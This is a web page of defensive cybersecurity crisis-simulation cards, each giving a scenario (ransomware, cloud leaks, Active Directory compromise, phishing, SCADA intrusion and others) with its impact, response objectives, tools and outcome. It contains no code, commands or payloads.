Crisis Simulations

WAR ROOM

Critical scenario analysis. From incident to resolution.

CRITICAL ID: op-blackout

OPERATION BLACKOUT

RANSOMWARE / CRISIS

>> SITUATION : A major hospital is paralyzed by Ryuk ransomware. Life support systems are threatened.

POTENTIAL IMPACT

Critical care stoppage, life-threatening risk to patients, $5M daily loss.

TACTICAL OBJECTIVES

  • [-] Isolate patient zero
  • [-] Restore vital services
  • [-] Negotiate (decoy)
  • [-] Forensics

REQUIRED ARSENAL

Wireshark Volatility Powershell Backup Strat
MISSION STATUS: MISSION ACCOMPLISHED
HIGH ID: double-extortion

DOUBLE EXTORTION

RANSOMWARE / LEAK

>> SITUATION : The LockBit group threatens to publish 500GB of confidential legal data if the ransom is not paid.

POTENTIAL IMPACT

GDPR sanctions (4% revenue), loss of client trust, legal lawsuits.

TACTICAL OBJECTIVES

  • [-] Assess data sensitivity
  • [-] Prepare crisis comms
  • [-] Plug the breach
  • [-] Notify authorities

REQUIRED ARSENAL

DLP Dark Web Monitor Legal Tech Crisis Comms
MISSION STATUS: DATA SECURED
CRITICAL ID: esxi-encrypt

VIRTUAL NIGHTMARE

INFRASTRUCTURE / ESXI

>> SITUATION : An unpatched OpenSLP flaw allows encryption of all production ESXi hypervisors.

POTENTIAL IMPACT

Total Datacenter shutdown, 400 VMs offline, 72h service interruption.

TACTICAL OBJECTIVES

  • [-] Rebuild hypervisors
  • [-] Restore VMs from immutable backups
  • [-] Patch vulnerability
  • [-] Harden SSH access

REQUIRED ARSENAL

VMware CLI Veeam Nmap Hardening Guide
MISSION STATUS: INFRA RESTORED
HIGH ID: cloud-leak

CELESTIAL LEAK

CLOUD / DATA LEAK

>> SITUATION : A misconfigured S3 bucket exposes 1TB of customer data (PII).

POTENTIAL IMPACT

Exposure of 1M customers, massive identity theft, record fine.

TACTICAL OBJECTIVES

  • [-] Lock the bucket
  • [-] Analyze access logs
  • [-] Identify cause (IaC)
  • [-] Notify authorities

REQUIRED ARSENAL

AWS CloudTrail Terraform Prowler GDPR Compliance
MISSION STATUS: INCIDENT CLOSED
MEDIUM ID: kube-hijack

KUBE MINER

KUBERNETES / CRYPTOJACKING

>> SITUATION : A production Kubernetes cluster is hijacked to mine Monero via a malicious container.

POTENTIAL IMPACT

Cloud bill x1000, application performance degradation.

TACTICAL OBJECTIVES

  • [-] Identify malicious pod
  • [-] Trace source image
  • [-] Restrict RBAC rights
  • [-] Implement Network Policies

REQUIRED ARSENAL

Kubectl Falco Trivy Prometheus
MISSION STATUS: CLUSTER CLEANED
CRITICAL ID: azure-ad-takeover

AZURE STORM

CLOUD IDENTITY

>> SITUATION : Compromise of an Azure AD Global Admin account without MFA.

POTENTIAL IMPACT

Total tenant takeover, resource deletion, data theft.

TACTICAL OBJECTIVES

  • [-] Revoke sessions
  • [-] Enable forced MFA
  • [-] Audit login logs
  • [-] Check persistence rules

REQUIRED ARSENAL

Azure Sentinel Powershell MFA Conditional Access
MISSION STATUS: IDENTITY SECURED
HIGH ID: ghost-protocol

GHOST PROTOCOL

APT / THREAT HUNTING

>> SITUATION : Abnormal outbound traffic to an unknown IP. A stealthy attacker has been in the network for 6 months.

POTENTIAL IMPACT

Theft of strategic IP, long-term industrial espionage.

TACTICAL OBJECTIVES

  • [-] Trace lateral movements
  • [-] Identify persistence
  • [-] Cut exfiltration
  • [-] Complete eradication

REQUIRED ARSENAL

Splunk Sysmon Velociraptor YARA
MISSION STATUS: THREAT NEUTRALIZED
EXTREME ID: supply-chain-compromise

DOMINO EFFECT

SUPPLY CHAIN

>> SITUATION : A software update from a trusted vendor contains a backdoor.

POTENTIAL IMPACT

Simultaneous compromise of entire app portfolio, total loss of control.

TACTICAL OBJECTIVES

  • [-] Identify IOCs
  • [-] Block C2s
  • [-] Audit privileged access
  • [-] Crisis communication

REQUIRED ARSENAL

EDR Network Forensics Threat Intel Crisis Comms
MISSION STATUS: ANALYSIS IN PROGRESS
CRITICAL ID: golden-ticket

GOLDEN TICKET

IDENTITY / AD

>> SITUATION : Compromise of the KRBTGT account. Attacker can generate unlimited access tickets.

POTENTIAL IMPACT

Total and undetectable persistence on the Windows domain.

TACTICAL OBJECTIVES

  • [-] Detect fake tickets
  • [-] Double KRBTGT password rotation
  • [-] Rebuild trust
  • [-] Harden AD

REQUIRED ARSENAL

Mimikatz PingCastle AD Audit BloodHound
MISSION STATUS: DOMAIN SECURED
MEDIUM ID: ceo-fraud

THE FAKE CEO

BEC / DEEPFAKE

>> SITUATION : The CFO receives an urgent wire transfer order from the CEO (Audio Deepfake).

POTENTIAL IMPACT

Immediate financial loss of €500k, reputational damage.

TACTICAL OBJECTIVES

  • [-] Freeze transfer
  • [-] Analyze email headers
  • [-] Train Execs
  • [-] Strengthen procedures

REQUIRED ARSENAL

Email Gateway Awareness Banking Protocols
MISSION STATUS: FRAUD AVERTED
MEDIUM ID: insider-threat

THE MOLE

INSIDER / DLP

>> SITUATION : Leak of confidential blueprints. Logs are clean. The culprit has legitimate access.

POTENTIAL IMPACT

Loss of competitive advantage, internal sabotage.

TACTICAL OBJECTIVES

  • [-] Correlate physical/logical access
  • [-] Behavioral analysis (UEBA)
  • [-] Steganalysis
  • [-] Legal case

REQUIRED ARSENAL

DLP UEBA StegSolve Log Analysis
MISSION STATUS: SUSPECT IDENTIFIED
LOW ID: hr-phishing

TRAPPED CV

PHISHING / MALWARE

>> SITUATION : HR department receives a CV containing a malicious macro.

POTENTIAL IMPACT

Infection of HR workstation, access to employee personal data.

TACTICAL OBJECTIVES

  • [-] Isolate workstation
  • [-] Analyze payload
  • [-] Clean network
  • [-] Anti-phishing training

REQUIRED ARSENAL

Sandbox Antivirus Phishing Sim Education
MISSION STATUS: WORKSTATION CLEANED
EXTREME ID: industrial-sabotage

GHOST FACTORY

ICS / SCADA

>> SITUATION : PLCs in a water treatment plant receive erratic commands.

POTENTIAL IMPACT

Major health risk, environmental pollution, production halt.

TACTICAL OBJECTIVES

  • [-] Emergency Air Gap
  • [-] Switch to manual
  • [-] Analyze Modbus traffic
  • [-] Identify entry point

REQUIRED ARSENAL

Claroty Nozomi Safety Protocols Segmentation
MISSION STATUS: PHYSICAL SAFETY ENSURED
MEDIUM ID: iot-botnet

THE SWARM

DDOS / IOT

>> SITUATION : 500 Gbps DDoS attack originating from compromised IoT cameras.

POTENTIAL IMPACT

E-commerce site offline, revenue loss (€100k/hour).

TACTICAL OBJECTIVES

  • [-] Activate Scrubbing Center
  • [-] Block signatures
  • [-] Rate Limiting
  • [-] Service availability

REQUIRED ARSENAL

Cloudflare WAF Traffic Analysis Load Balancing
MISSION STATUS: SERVICE RESTORED
MEDIUM ID: smart-building-hack

HAUNTED BUILDING

IOT / BUILDING

>> SITUATION : Takeover of HVAC and elevator systems at HQ.

POTENTIAL IMPACT

Building evacuation, business stoppage, physical risk.

TACTICAL OBJECTIVES

  • [-] Isolate BMS network
  • [-] Reset controllers
  • [-] Patch IoT flaws
  • [-] Segment network

REQUIRED ARSENAL

Shodan Network Seg Firmware Update Physical Security
MISSION STATUS: BUILDING SECURED
HIGH ID: ai-poisoning

COGNITIVE POISON

AI SECURITY

>> SITUATION : Injection of biased data into the training dataset of a trading AI.

POTENTIAL IMPACT

Erroneous financial decisions, massive automated losses.

TACTICAL OBJECTIVES

  • [-] Audit dataset
  • [-] Retrain model
  • [-] Validate data sources
  • [-] Drift monitoring

REQUIRED ARSENAL

Adversarial ML Data Validation Model Ops Audit
MISSION STATUS: MODEL CORRECTED
FUTURE ID: quantum-decrypt

Q-DAY PREP

QUANTUM / CRYPTO

>> SITUATION : Interception of encrypted traffic today for future quantum decryption (Harvest Now, Decrypt Later).

POTENTIAL IMPACT

Future compromise of long-term secrets (diplomatic, industrial).

TACTICAL OBJECTIVES

  • [-] Inventory crypto
  • [-] Migrate to PQC
  • [-] Increase key size
  • [-] Crypto-agility

REQUIRED ARSENAL

PQC Algorithms Crypto Inventory Key Management Strategy
MISSION STATUS: IN PREPARATION
HIGH ID: deepfake-video

OPTICAL ILLUSION

DEEPFAKE / DISINFO

>> SITUATION : Release of a fake video of the CEO announcing imminent bankruptcy.

POTENTIAL IMPACT

Stock price crash (-20%), shareholder panic.

TACTICAL OBJECTIVES

  • [-] Authenticate video
  • [-] Rapid official denial
  • [-] Report to platforms
  • [-] Video forensics

REQUIRED ARSENAL

Deepware Media Forensics PR Crisis Legal
MISSION STATUS: DENIAL PUBLISHED
HIGH ID: mobile-spyware

PEGASUS

MOBILE / ESPIONAGE

>> SITUATION : A journalist's phone heats up. Data exfiltrated to suspicious servers.

POTENTIAL IMPACT

Compromise of sources, physical danger to the journalist.

TACTICAL OBJECTIVES

  • [-] Mobile forensics
  • [-] Detect IOCs
  • [-] Secure comms
  • [-] Protect sources

REQUIRED ARSENAL

MVT Network Analysis Encryption Burner Phones
MISSION STATUS: DEVICE ANALYZED
LOW ID: wifi-pineapple

ROGUE PINEAPPLE

WIFI / MITM

>> SITUATION : A malicious Wi-Fi access point intercepts employee traffic in the lobby.

POTENTIAL IMPACT

Credential theft, interception of unencrypted documents.

TACTICAL OBJECTIVES

  • [-] Locate rogue AP
  • [-] Deauth clients
  • [-] Force VPN
  • [-] WIPS

REQUIRED ARSENAL

WiFi Analyzer WIPS VPN Physical Search
MISSION STATUS: AP DISABLED
MEDIUM ID: sql-injection

LETHAL INJECTION

WEB / SQLI

>> SITUATION : Extraction of customer database via a vulnerable contact form.

POTENTIAL IMPACT

Theft of 100k customer records, data leak.

TACTICAL OBJECTIVES

  • [-] Patch code
  • [-] Sanitize inputs
  • [-] WAF blocking
  • [-] DB credential rotation

REQUIRED ARSENAL

SQLMap WAF Code Review Prepared Statements
MISSION STATUS: FLAW PATCHED
MEDIUM ID: xss-stored

PERSISTENT SCRIPT

WEB / XSS

>> SITUATION : Theft of admin session cookies via an infected blog comment.

POTENTIAL IMPACT

CMS takeover, site defacement.

TACTICAL OBJECTIVES

  • [-] Clean DB
  • [-] CSP (Content Security Policy)
  • [-] HttpOnly Cookies
  • [-] Sanitization

REQUIRED ARSENAL

Burp Suite CSP Evaluator HTML Purifier Scanner
MISSION STATUS: CODE CLEANED
HIGH ID: api-breach

API BACKDOOR

API SECURITY

>> SITUATION : A forgotten test API gives access to production data without authentication (BOLA).

POTENTIAL IMPACT

Massive data exposure, security control bypass.

TACTICAL OBJECTIVES

  • [-] Close endpoint
  • [-] API Inventory (Zombie APIs)
  • [-] Implement OAuth2
  • [-] Rate Limiting

REQUIRED ARSENAL

Postman OWASP ZAP API Gateway Swagger
MISSION STATUS: API SECURED
LOW ID: tailgating

THE SHADOW

PHYSICAL SEC

>> SITUATION : An intruder follows an employee to enter the secure zone without a badge.

POTENTIAL IMPACT

Physical access to servers, hardware theft, keylogger installation.

TACTICAL OBJECTIVES

  • [-] CCTV review
  • [-] Hardware inventory
  • [-] Employee awareness
  • [-] Access control

REQUIRED ARSENAL

CCTV Access Logs Security Guards Training
MISSION STATUS: INTRUDER EVICTED
MEDIUM ID: usb-drop

LOST DRIVE

PHYSICAL / MALWARE

>> SITUATION : Infected USB drives are dropped in the parking lot. An employee plugs one in.

POTENTIAL IMPACT

Internal network infection, bridge to the outside.

TACTICAL OBJECTIVES

  • [-] Block USB ports
  • [-] Scan workstation
  • [-] Prevention campaign
  • [-] EDR blocking

REQUIRED ARSENAL

GPO EDR Antivirus Awareness
MISSION STATUS: THREAT CONTAINED